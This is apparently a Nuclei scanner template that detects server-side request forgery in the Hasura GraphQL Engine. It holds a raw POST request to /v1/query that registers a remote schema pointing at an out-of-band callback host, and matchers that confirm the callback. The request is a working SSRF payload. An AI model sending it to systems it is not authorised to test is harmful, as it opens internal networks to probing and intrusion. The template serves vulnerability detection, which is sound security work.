id: hasura-graphql-ssrf info: name: Hasura GraphQL Engine - SSRF Side Request Forgery author: princechaddha severity: high reference: https://cxsecurity.com/issue/WLB-2021040115 tags: hasura,ssrf,graphql requests: - raw: - | POST /v1/query HTTP/1.1 Host: {{Hostname}} Content-Type: application/json Accept: */* { "type":"bulk", "args":[ { "type":"add_remote_schema", "args":{ "name":"test", "definition":{ "url":"https://{{interactsh-url}}", "headers":[ ], "timeout_seconds":60, "forward_client_headers":true } } } ] } matchers-condition: and matchers: - type: status status: - 400 - type: word part: interactsh_protocol words: - "http"